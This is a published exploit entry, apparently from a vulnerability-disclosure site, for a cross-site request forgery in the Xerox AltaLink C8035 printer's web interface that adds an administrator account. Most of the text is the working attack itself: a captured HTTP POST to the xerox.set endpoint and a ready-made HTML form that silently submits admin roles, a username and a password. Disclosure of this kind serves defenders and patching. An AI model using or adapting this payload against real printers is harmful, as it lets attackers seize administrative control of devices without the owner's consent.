Xerox AltaLink C8035 Printer Cross-Site Request Forgery (Add Admin)

2019.12.30
Credit: Ismail Tasdelen
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin) # Date: 2018-12-17 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.xerox.com/ # Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series # Software : Xerox Printer # Product Version: AltaLink C8035 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware. # A request to add users is made in the Device User Database form field. This request is captured by # the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request # to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.) # HTTP POST Request : POST /dummypost/xerox.set HTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 707 Origin: https://XXX.XXX.XXX.XXX Connection: close Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10 Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp Upgrade-Insecure-Requests: 1 NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10 # CSRF PoC HTML : <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST"> <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;" /> <input type="hidden" name="isRoles" value="True" /> <input type="hidden" name="isPassword" value="True" /> <input type="hidden" name="isCreate" value="True" /> <input type="hidden" name="rolesStr" value="6&#44;1&#44;2" /> <input type="hidden" name="limited" value="0" /> <input type="hidden" name="oid" value="0" /> <input type="hidden" name="minLength" value="1" /> <input type="hidden" name="maxLength" value="63" /> <input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" /> <input type="hidden" name="isUserNameDisallowed" value="TRUE" /> <input type="hidden" name="isNumberRequired" value="" /> <input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" /> <input type="hidden" name="currentPage" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" /> <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;User&#95;Edit&#95;fn" /> <input type="hidden" name="frmFriendlyName" value="Ismail&#32;Tasdelen" /> <input type="hidden" name="frmUserName" value="ismailtasdelen" /> <input type="hidden" name="frmNewPassword" value="Test1234&#33;" /> <input type="hidden" name="frmRetypePassword" value="Test1234&#33;" /> <input type="hidden" name="frmOldPassword" value="undefined" /> <input type="hidden" name="SaveURL" value="&#47;properties&#47;authentication&#47;UserEdit&#46;php&#63;nav&#95;point&#95;key&#61;10" /> <input type="submit" value="Submit request" /> </form> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top